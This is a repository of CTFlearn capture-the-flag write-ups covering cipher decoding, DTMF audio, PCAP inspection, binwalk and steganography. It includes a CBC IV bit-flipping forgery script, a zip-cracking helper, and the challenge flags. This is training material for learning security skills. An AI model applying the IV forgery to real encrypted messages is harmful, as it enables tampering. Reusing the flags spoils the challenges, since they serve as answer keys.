Now Try: ^&,*$,&),!@#,*#,!!^,(&,!!$,(%,$^,(%,*&,(&,!!$,!!%,(%,$^,(%,&),!!!,!!$,(%,$^,(%,&^,!)%,!)@,!)!,!@%
However, this isn't as easy as you might think.
```

#### Step-2:
If we look carefully, the assignment `!@#$%^&*(` = `123456789` is the same as the symbols on a QWERTY keyboard.
So it means `)` = `0`.

So finally `!@#$%^&*()` = `1234567890`

#### Step-3:
I just decrypted the text as normal decimal text.

```python
message = "^&,*$,&),!@#,*#,!!^,(&,!!$,(%,$^,(%,*&,(&,!!$,!!%,(%,$^,(%,&),!!!,!!$,(%,$^,(%,&^,!)%,!)@,!)!,!@%"
numbers = "67,84,70,123,83,116,97,114,95,46,95,87,97,114,115,95,46,95,70,111,114,95,46,95,76,105,102,101,125"
```
If you want the string of numbers separated by spaces, it's here:
`67 84 70 123 83 116 97 114 95 46 95 87 97 114 115 95 46 95 70 111 114 95 46 95 76 105 102 101 125`

#### Step-4:
We just need to decrypt it online. I did it [here](https://cryptii.com/pipes/decimal-text).



#### Step-5:
Finally the flag becomes:
`CTF{Star_._Wars_._For_._Life}`
--------------------------------------------------------------------------------
/Cryptography/The Simpsons/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/The Simpsons/Flag.png
--------------------------------------------------------------------------------
/Cryptography/The Simpsons/ItsKrumpingTime.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/The Simpsons/ItsKrumpingTime.jpg
--------------------------------------------------------------------------------
/Cryptography/The Simpsons/encoding.py:
--------------------------------------------------------------------------------
# Octal character codes, separated by spaces
encoded = "152 162 152 145 162 167 150 172 153 162 145 170 141 162"
list_encoded = encoded.split(' ')
# Parse each token as base 8, then map the code point to its character
decimal_encoded = [int(i, 8) for i in list_encoded]
string_encoded = [chr(i) for i in decimal_encoded]
string_encoded = ''.join(string_encoded)
print("String Encoded: " + string_encoded)
--------------------------------------------------------------------------------
/Cryptography/The Simpsons/key.py:
--------------------------------------------------------------------------------
# Octal character codes, separated by spaces
key = "110 157 167 040 155 165 143 150 040 144 151 144 040 115 141 147 147 151 145 040 157 162 151 147 151 156 141 154 154 171 040 143 157 163 164 077 040 050 104 151 166 151 144 145 144 040 142 171 040 070 054 040 164 157 040 164 150 145 040 156 145 141 162 145 163 164 040 151 156 164 145 147 145 162 054 040 141 156 144 040 164 150 145 156 040 160 154 165 163 040 146 157 165 162 051"
list_key = key.split(' ')
# Parse each token as base 8, then map the code point to its character
decimal_key = [int(i, 8) for i in list_key]
asc_key = [chr(i) for i in decimal_key]
asc_key = ''.join(asc_key)
print(asc_key)
--------------------------------------------------------------------------------
/Cryptography/Tone dialing/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Tone dialing/Flag.png
--------------------------------------------------------------------------------
/Cryptography/Tone dialing/README.md:
--------------------------------------------------------------------------------
## Tone dialing
The main idea to find the flag is to analyze the `.wav` file and get the flag using a DTMF Decoder.

#### Step-1:
We are given `you_know_what_to_do.wav`. After searching for a while on the internet, I came across this [DTMF Decoder](http://www.polar-electric.com/DTMF/Index.html) which eventually helped me to solve the problem.

#### Step-2:
This [DTMF GitHub Repo](https://github.com/ribt/dtmf-decoder) is a nice tool, which can help us to extract data from the wav file.

After following the directions mentioned in the repository, I executed the following command:
```
dtmf you_know_what_to_do.wav
```
I got the following output:
```
67847010810197110123678289808479718265807289125
```
So, delimiting the numbers gave me:
```
67 84 70 108 101 97 110 123 67 82 89 80 84 79 71 82 65 80 72 89 125
```

#### Step-3:
I used these numbers to get ASCII text [here](https://convert.town/ascii-to-text). Later we got the flag.



#### Step-4:
Finally, the flag becomes:
`CTFlean{CRYPTOGRAPHY}`
--------------------------------------------------------------------------------
/Cryptography/Tone dialing/you_know_what_to_do.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Tone dialing/you_know_what_to_do.wav
--------------------------------------------------------------------------------
/Cryptography/Vigenere Cipher/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Vigenere Cipher/Flag.png
--------------------------------------------------------------------------------
/Cryptography/Vigenere Cipher/README.md:
--------------------------------------------------------------------------------
## Vigenere Cipher
The main idea of finding the flag is just having knowledge about the Vigenere Cipher.

#### Step-1:

It's very easy if you have a basic idea of the Vigenere Cipher.
If you don't know, please refer to:
https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher

So this is what is given in the message of the challenge:

```
The vignere cipher is a method of encrypting alphabetic text by using a series of interwoven Caesar ciphers based on the letters of a keyword.

I’m not sure what this means, but it was left lying around: blorpy

gwox{RgqssihYspOntqpxs}
```
#### Step-2:
One important thing to know is that the Vigenere Cipher requires a key to decode any message.
I used this URL to decode my message and used the given key: `blorpy`
https://cryptii.com/

#### Step-3:
This was my output:



That's it. That's our flag.

#### Step-4:

Finally the flag becomes:
`flag{CiphersAreAwesome}`
--------------------------------------------------------------------------------
/Cryptography/We want Nudes instead of Nukes/exploit.py:
--------------------------------------------------------------------------------
IV = bytearray.fromhex("391e95a15847cfd95ecee8f7fe7efd66")
CT = bytearray.fromhex("8473dcb86bc12c6b6087619c00b6657e")

# Hex-encoded messages from the description of the challenge
ORIGINAL_MESSAGE = bytearray.fromhex(
    "464952455f4e554b45535f4d454c4121")  # FIRE_NUKES_MELA!

ALTERED_MESSAGE = bytearray.fromhex(
    "53454e445f4e554445535f4d454c4121")  # SEND_NUDES_MELA!

ALTERED_IV = bytearray()

# In CBC the first plaintext block is D(CT) XOR IV, so XORing
# (ORIGINAL XOR ALTERED) into the IV turns the decrypted block into
# ALTERED without touching the ciphertext or knowing the key.
for i in range(16):
    ALTERED_IV.append(ALTERED_MESSAGE[i] ^ ORIGINAL_MESSAGE[i] ^ IV[i])

print(f'Flag: flag{{{ALTERED_IV.hex()},{CT.hex()}}}')
--------------------------------------------------------------------------------
/Cryptography/Zippy.zip/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/Flag.png
--------------------------------------------------------------------------------
/Cryptography/Zippy.zip/exploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/exploit.png
--------------------------------------------------------------------------------
/Cryptography/Zippy.zip/exploit.py:
--------------------------------------------------------------------------------
# Assigning the output string from the previous "crack.py" file execution
output = """
flag00.zip / flag00 : 'CTFl'
flag01.zip / flag01 : 'earn'
flag02.zip / flag02 : '{s0m'
flag03.zip / flag03 : '3t1m'
flag04.zip / flag04 : '35_u'
flag05.zip / flag05 : '$1ng'
flag06.zip / flag06 : '_h4r'
flag07.zip / flag07 : 'd_p4'
flag08.zip / flag08 : 's5w0'
flag09.zip / flag09 : 'rd_i'
flag10.zip / flag10 : '5_n0'
flag11.zip / flag11 : 't_3n'
flag12.zip / flag12 : '0ugh'
flag13.zip / flag13 : '}'
"""

# Split the output into lines and extract the last column
lines = output.strip().split('\n')
last_column = [line.split(' : ')[1].strip(" '") for line in lines]

# Concatenate the strings within quotes
flag = ''.join(last_column)

# Print the final flag
print("Flag: " + flag)
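The XOR in `We want Nudes instead of Nukes/exploit.py` above works because CBC mixes the IV into the first block after the block cipher has run, so an IV that is not authenticated lets anyone holding the message steer the first plaintext block. The following added example (not part of the repository) replays that with the page's IV and messages and then shows an HMAC over IV and ciphertext rejecting the change; the Feistel stand-in cipher (used instead of AES so only the standard library is needed), both keys and all function names are assumptions.

```python
import hashlib
import hmac


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, rnd: int, half: bytes) -> bytes:
    # Round function of the stand-in 16-byte block cipher (assumption: NOT AES).
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, xor(left, _round(key, rnd, right))
    return left + right


def toy_decrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = xor(right, _round(key, rnd, left)), left
    return left + right


def cbc_encrypt_block(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    # First CBC block: C1 = E_k(P1 XOR IV)
    return toy_encrypt_block(key, xor(plaintext, iv))


def cbc_decrypt_block(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    # First CBC block: P1 = D_k(C1) XOR IV. The IV is applied outside the cipher.
    return xor(toy_decrypt_block(key, ciphertext), iv)


def retarget_iv(iv: bytes, known: bytes, wanted: bytes) -> bytes:
    # Same XOR as the loop in exploit.py: IV' = IV XOR known XOR wanted
    return xor(iv, xor(known, wanted))


def seal(enc_key: bytes, mac_key: bytes, iv: bytes, plaintext: bytes):
    # Encrypt-then-MAC: the tag covers the IV as well as the ciphertext.
    ct = cbc_encrypt_block(enc_key, iv, plaintext)
    tag = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
    return iv, ct, tag


def open_sealed(enc_key: bytes, mac_key: bytes, iv: bytes, ct: bytes, tag: bytes) -> bytes:
    # Verify before decrypting, in constant time.
    expected = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("authentication failed: IV or ciphertext was modified")
    return cbc_decrypt_block(enc_key, iv, ct)


def demo() -> dict:
    enc_key = b"constructed-enc-key"  # constructed for this example
    mac_key = b"constructed-mac-key"  # constructed for this example
    iv = bytes.fromhex("391e95a15847cfd95ecee8f7fe7efd66")  # IV from the page
    original = b"FIRE_NUKES_MELA!"
    altered = b"SEND_NUDES_MELA!"

    # Unauthenticated CBC: the ciphertext is untouched, only the IV changes.
    ct = cbc_encrypt_block(enc_key, iv, original)
    forged_iv = retarget_iv(iv, original, altered)
    unauthenticated = cbc_decrypt_block(enc_key, forged_iv, ct)

    # Encrypt-then-MAC: the same IV change no longer verifies.
    _, ct2, tag = seal(enc_key, mac_key, iv, original)
    try:
        open_sealed(enc_key, mac_key, forged_iv, ct2, tag)
        rejected = False
    except ValueError:
        rejected = True
    honest = open_sealed(enc_key, mac_key, iv, ct2, tag)

    return {
        "forged_iv": forged_iv.hex(),
        "unauthenticated": unauthenticated,
        "rejected": rejected,
        "honest": honest,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The forged IV does not depend on the key or the cipher, which is why the same value comes out of `exploit.py`; an AEAD mode such as AES-GCM gives the same protection as the separate HMAC shown here.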
--------------------------------------------------------------------------------
/Cryptography/Zippy.zip/exploit.sh:
--------------------------------------------------------------------------------
cd flag_parts/
python3 ../crack.py flag00.zip flag01.zip flag02.zip flag03.zip flag04.zip flag05.zip flag06.zip flag07.zip flag08.zip flag09.zip flag10.zip flag11.zip flag12.zip flag13.zip
--------------------------------------------------------------------------------
/Cryptography/Zippy.zip/flag_parts.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts.zip
--------------------------------------------------------------------------------
/Cryptography/Zippy.zip/flag_parts/flag00.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag00.zip
--------------------------------------------------------------------------------
/Cryptography/Zippy.zip/flag_parts/flag01.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag01.zip
--------------------------------------------------------------------------------
/Cryptography/Zippy.zip/flag_parts/flag02.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag02.zip
--------------------------------------------------------------------------------
/Cryptography/Zippy.zip/flag_parts/flag03.zip:
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag03.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag04.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag04.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag05.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag05.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag06.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag06.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag07.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag07.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag08.zip: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag08.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag09.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag09.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag10.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag10.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag11.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag11.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag12.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag12.zip -------------------------------------------------------------------------------- /Cryptography/Zippy.zip/flag_parts/flag13.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Zippy.zip/flag_parts/flag13.zip 
--------------------------------------------------------------------------------
/Cryptography/otpyrC/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/otpyrC/1.png
--------------------------------------------------------------------------------
/Cryptography/otpyrC/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/otpyrC/Flag.png
--------------------------------------------------------------------------------
/Cryptography/otpyrC/README.md:
--------------------------------------------------------------------------------
## otpyrC
The main idea of finding the flag is String Reversal and simple decryption.


#### Step-1:
After I read the given message:

```
Okay, this one is pretty easy... but not necessarily.
d733432373937303734373666343730373937323733343b7644534
```

#### Step-2:
I was too lazy af to write a script in Python. So, I just did the reversal online (reversed after seeing the title) at:
https://codebeautify.org/reverse-string



#### Step-3:

It was just hexadecimal text and I decrypted it.



I got `CTF{43727970746f7470797243}`, but it did not work as the flag.

So I decrypted the string again.



#### Step-4:
Finally, the flag becomes:
`CryptotpyrC`
--------------------------------------------------------------------------------
/Cryptography/otpyrC/Reverse.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/otpyrC/Reverse.png
--------------------------------------------------------------------------------
/Forensics/07601/AGT.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/07601/AGT.png
--------------------------------------------------------------------------------
/Forensics/A CAPture of a Flag/Base64.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/A CAPture of a Flag/Base64.png
--------------------------------------------------------------------------------
/Forensics/A CAPture of a Flag/HTTP.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/A CAPture of a Flag/HTTP.png
--------------------------------------------------------------------------------
/Forensics/A CAPture of a Flag/README.md:
--------------------------------------------------------------------------------
## A CAPture of a Flag
The main idea of finding the flag is exploring the given PCAP file in Wireshark.

#### Step-1:
After downloading `flag (4)` (a PCAP file) from the cloud, I directly opened it in the Wireshark application.

For those who are unaware of how to filter streams or use this application, please do your homework here:

https://www.wireshark.org/

#### Step-2:

I tried to check the TCP stream for some clues and then I tried the UDP streams for some clues. Finally, I used the filter to get only HTTP requests.



#### Step-3:

I went through all the requests and this request caught my eye.
`247 2.270670 10.50.203.75 185.21.216.190 HTTP 504 GET /?msg=ZmxhZ3tBRmxhZ0luUENBUH0= HTTP/1.1 `

It has a Base64-encoded message.

#### Step-4:

So finally, I decoded it online at: https://www.base64decode.org/

I got the flag there:



Voila, we have it here.

#### Step-5:
Finally the flag becomes:
`flag{AFlagInPCAP}`
--------------------------------------------------------------------------------
/Forensics/A CAPture of a Flag/flag (4):
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/A CAPture of a Flag/flag (4)
--------------------------------------------------------------------------------
/Forensics/Binwalk/PurpleThing.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Binwalk/PurpleThing.jpeg
--------------------------------------------------------------------------------
/Forensics/Binwalk/README.md:
--------------------------------------------------------------------------------
## Binwalk
The main idea of finding the flag is using Binwalk commands and its extensions.

#### Step-1:
After downloading `PurpleThing.jpeg` from the cloud, I tried `strings PurpleThing.jpeg | grep {`.



I couldn't find anything special.
10 | 11 | #### Step-2: 12 | 13 | So I tried `binwalk PurpleThing.jpeg` as the question suggests. 14 | 15 | It showed me following output: 16 | 17 | ```bash 18 | DECIMAL HEXADECIMAL DESCRIPTION 19 | -------------------------------------------------------------------------------- 20 | 0 0x0 PNG image, 780 x 720, 8-bit/color RGBA, non-interlaced 21 | 41 0x29 Zlib compressed data, best compression 22 | 153493 0x25795 PNG image, 802 x 118, 8-bit/color RGBA, non-interlaced 23 | ``` 24 | 25 | Clearly, there is hidden data in there, let's extract that. 26 | #### Step-3: 27 | I input a command of `binwalk -D 'image:png' PurpleThing.jpeg` and I get a directory named `_PurpleThing.jpeg.extracted`. 28 | 29 | The contents are different files. In it `25795.png` has the flag. 30 | 31 | #### Step-4: 32 | 33 | Finally the flag becomes: 34 | `ABCTF{b1nw4lk_is_us3ful}` 35 | -------------------------------------------------------------------------------- /Forensics/Blank Page/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Blank Page/1.png -------------------------------------------------------------------------------- /Forensics/Blank Page/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Blank Page/Flag.png -------------------------------------------------------------------------------- /Forensics/Blank Page/TheMessage.txt: -------------------------------------------------------------------------------- 1 | ‏ ‏‏ ‏‏‏ ‏ ‏‏ ‏‏‏‏ ‏‏ ‏‏ ‏ ‏ ‏ ‏ ‏ ‏‏ ‏ ‏‏ ‏ ‏ ‏ ‏ ‏‏‏ ‏‏ ‏‏ ‏‏ ‏‏‏‏ ‏‏ ‏ ‏‏ ‏ ‏‏ ‏‏ ‏ ‏ ‏ ‏‏ ‏‏‏ ‏‏‏ ‏ ‏‏ ‏ ‏ ‏ ‏‏ ‏ ‏ ‏ ‏ ‏‏ ‏ ‏ ‏‏‏ ‏ ‏‏‏ ‏ ‏‏ ‏‏‏‏ ‏‏‏ ‏ ‏‏ ‏ ‏ ‏‏‏ ‏‏ ‏‏‏ ‏ ‏‏‏ ‏‏ ‏ ‏ ‏ ‏ ‏‏ ‏ ‏‏ ‏‏ ‏‏‏ ‏ ‏‏ ‏ ‏ ‏‏ ‏‏ ‏‏‏ ‏‏ ‏ ‏ ‏ ‏ ‏ ‏ ‏ ‏‏ ‏‏ ‏ ‏‏‏‏ ‏ ‏‏ ‏‏‏‏ ‏‏‏ ‏ ‏ ‏ 
‏‏‏ ‏ ‏‏ ‏ ‏ ‏‏ ‏ ‏‏ ‏ ‏ ‏‏‏ ‏ ‏‏ ‏ ‏‏ ‏ ‏ ‏‏‏ ‏‏ ‏ ‏‏‏‏ ‏ ‏‏ ‏‏‏‏ ‏‏‏ ‏ ‏ ‏ ‏‏‏ ‏‏ ‏ ‏‏‏ ‏‏ ‏‏‏ ‏‏ ‏‏ ‏ ‏ ‏‏ ‏ ‏ ‏‏‏ ‏ ‏ ‏‏ ‏‏ ‏‏‏‏ ‏‏ ‏‏‏ ‏‏ ‏‏‏ ‏‏‏ ‏ ‏‏ ‏ ‏‏‏ ‏ ‏‏‏ ‏‏ ‏ ‏‏‏ ‏ ‏ ‏ ‏‏ ‏ ‏‏ ‏‏‏‏ ‏‏‏ ‏ ‏ ‏‏‏ ‏ ‏ ‏‏ ‏‏ ‏‏ ‏ ‏ ‏‏‏ ‏ ‏‏‏ ‏‏ ‏‏‏ ‏ ‏ ‏‏‏ ‏ ‏‏ ‏ ‏‏‏ ‏‏ ‏‏ ‏ ‏‏ ‏ ‏‏‏ ‏‏‏ ‏‏ ‏ ‏ ‏‏ ‏‏ ‏‏ ‏‏ ‏ ‏‏ ‏‏ ‏‏ ‏‏‏‏ ‏‏ ‏‏ ‏ ‏‏ ‏ ‏ ‏ ‏‏‏ ‏ ‏‏ ‏‏‏‏ ‏‏ ‏‏ ‏ ‏‏ ‏‏‏‏ ‏‏‏ ‏ ‏‏‏ ‏ ‏‏ ‏‏‏‏ ‏‏‏ ‏‏‏ ‏ ‏‏‏ ‏ ‏ ‏ ‏‏‏ ‏‏ ‏‏‏‏ ‏‏ ‏‏‏‏ ‏‏ ‏ ‏ ‏‏ ‏‏ ‏‏‏ ‏ ‏ ‏‏ ‏‏ ‏‏ ‏ ‏‏ ‏ ‏‏‏ ‏ ‏ ‏ ‏ ‏ ‏‏ ‏ ‏ ‏ ‏ ‏‏ ‏‏ ‏‏ ‏‏ ‏ ‏ ‏‏ ‏ ‏‏‏ ‏ ‏‏ ‏‏‏ ‏‏‏‏ ‏‏ ‏ ‏ ‏ ‏‏ ‏‏ ‏ ‏‏‏‏‏ ‏‏‏‏ ‏ ‏‏ ‏‏‏ ‏ ‏ ‏ ‏‏‏‏‏ ‏‏‏ ‏ ‏‏ ‏‏ ‏ ‏‏‏‏ ‏ ‏‏‏ ‏‏ ‏ ‏ ‏‏‏‏‏ ‏‏‏ ‏ ‏‏ ‏ ‏‏ ‏ ‏ ‏‏ ‏ ‏ ‏ ‏‏‏‏‏ ‏‏‏‏ ‏ ‏‏ ‏‏‏‏ ‏‏‏ ‏ ‏ ‏ ‏‏‏‏‏ ‏‏‏ ‏‏ ‏ ‏‏ ‏ ‏ ‏‏ ‏ ‏ ‏‏ ‏‏ ‏‏ ‏ ‏‏‏‏‏ ‏ -------------------------------------------------------------------------------- /Forensics/Blank Page/exploit.py: -------------------------------------------------------------------------------- 1 | #! usr/bin/python3 2 | file = open("TheMessage.txt", "r").read() 3 | result = "" 4 | for char in file: 5 | if ord(char) == 32: 6 | result += "0" 7 | else: 8 | result += "1" 9 | print(result) -------------------------------------------------------------------------------- /Forensics/Bobby Toe's iPad/README.md: -------------------------------------------------------------------------------- 1 | ## Bobby Toe's iPad 2 | The main idea of getting the flag is using hex dump to get the flag. 3 | 4 | #### Step-1: 5 | After I downloaded `bobbytoesipad.png`, I tried basic strings, binwalk, but nothing special. 6 | 7 | 8 | 9 | #### Step-2: 10 | So, now I checked the hex code at: https://www.onlinehexeditor.com/ 11 | 12 | 13 | 14 | I split the image where I found the message: `congrats you found me! you win an iPad!` 15 | 16 | ##### Note: `ff d8 ff e0` are the first hex of a JPEG file. 

After splitting, I got this:



#### Step-3:
I used an [Online Stego Tool](https://incoherency.co.uk/image-steganography/#unhide) to find the hidden message in the image:

I got this:



Also, I got this weird string in the image: `zpv_tigqylhbafmeoesllpms`

#### Step-4:
The description of the challenge hints that the flag is in the iPad, so after some searching, I got this: http://rumkin.com/tools/cipher/otp.php to decode a one-time pad message.

Note that we got the `bbbabydonthurtmewhatislove` string in the split image before! That's the padding here.




#### Step-5:
Finally, the flag becomes:
`you_thinkyougotskillshuh`
--------------------------------------------------------------------------------
/Forensics/Bobby Toe's iPad/bobbytoesipad.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Bobby Toe's iPad/bobbytoesipad.png
--------------------------------------------------------------------------------
/Forensics/Bobby Toe's iPad/hex.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Bobby Toe's iPad/hex.png
--------------------------------------------------------------------------------
/Forensics/Bobby Toe's iPad/otp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Bobby Toe's iPad/otp.png
--------------------------------------------------------------------------------
/Forensics/Bobby Toe's iPad/split.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Bobby Toe's iPad/split.png
--------------------------------------------------------------------------------
/Forensics/Bobby Toe's iPad/stego.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Bobby Toe's iPad/stego.png
--------------------------------------------------------------------------------
/Forensics/Brute Force is Fun!/legotroopers.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Brute Force is Fun!/legotroopers.jpg
--------------------------------------------------------------------------------
/Forensics/Brute Force is Fun!/output/audit.txt:
--------------------------------------------------------------------------------
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File

Foremost started at Thu Sep 10 20:41:19 2020
Invocation: foremost legotroopers.jpg
Output directory: /home/rishit/Desktop/Buffer/output
Configuration file: /etc/foremost.conf
------------------------------------------------------------------
File: legotroopers.jpg
Start: Thu Sep 10 20:41:19 2020
Length: 1 MB (2045340 bytes)

Num   Name (bs=512)   Size   File Offset   Comment

0:    00000000.jpg    6 KB   0
1:    00000012.zip    1 MB   6438
Finish: Thu Sep 10 20:41:19 2020

2 FILES EXTRACTED

jpg:= 1
zip:= 1
------------------------------------------------------------------

Foremost finished at Thu Sep 10 20:41:19 2020

--------------------------------------------------------------------------------
/Forensics/Brute Force is Fun!/output/jpg/00000000.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Brute Force is Fun!/output/jpg/00000000.jpg
--------------------------------------------------------------------------------
/Forensics/Brute Force is Fun!/output/zip/00000012.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Brute Force is Fun!/output/zip/00000012.zip
--------------------------------------------------------------------------------
